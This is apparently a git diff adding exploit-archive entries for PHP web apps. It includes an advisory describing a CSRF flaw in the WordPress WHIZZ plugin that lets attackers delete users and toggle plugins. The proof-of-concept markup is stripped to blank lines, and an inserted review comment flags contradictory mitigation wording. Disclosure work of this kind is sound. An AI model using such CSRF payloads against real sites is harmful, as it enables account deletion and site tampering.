+
+ \"> + + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/41844.html b/platforms/php/webapps/41844.html new file mode 100755 index 000000000..d2dbdaed7 --- /dev/null +++ b/platforms/php/webapps/41844.html @@ -0,0 +1,51 @@ + + +
+ + + + + +
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/41845.txt b/platforms/php/webapps/41845.txt
new file mode 100755
index 000000000..e0580b216
--- /dev/null
+++ b/platforms/php/webapps/41845.txt
@@ -0,0 +1,34 @@
+======
+Software: WordPress WHIZZ
+Version: <1.1.1
+Homepage: https://wordpress.org/plugins/whizz/
+=======
+
+Description
+================
+Get type CSRF in WordPress WHIZZ allows attackers to delete any wordpress users and change plugins status
+
+POC:
+========
+include in the page ,then attack will occur:
+
+delete user:
+
+
+
+
+active or disactive plugins:
+
+
+
+
+
+
+Mitigations
+================
+Disable the plugin until a new version is released that fixes this bug.
+
+
+FIX:
+==========
+https://wordpress.org/plugins/whizz/ 1.1.1 changelog->Specifically
\ No newline at end of file
diff --git a/platforms/php/webapps/41846.html b/platforms/php/webapps/41846.html
new file mode 100755
index 000000000..d07a1f5f6
--- /dev/null
+++ b/platforms/php/webapps/41846.html
@@ -0,0 +1,40 @@
+
+
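Review bot: The Mitigations section of 41845.txt tells users to disable the plugin "until a new version is released that fixes this bug", but the FIX section immediately below points at the 1.1.1 changelog as already containing the fix, and the header reads `Version: <1.1.1`, so the two sections contradict each other about whether a patched release exists. Reword the mitigation to `Update to WHIZZ 1.1.1 or later; if updating is not possible, disable the plugin until it can be updated.` so that readers are steered to the fix first and to the workaround only as a fallback.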
+ + + +  +  +  +  +  +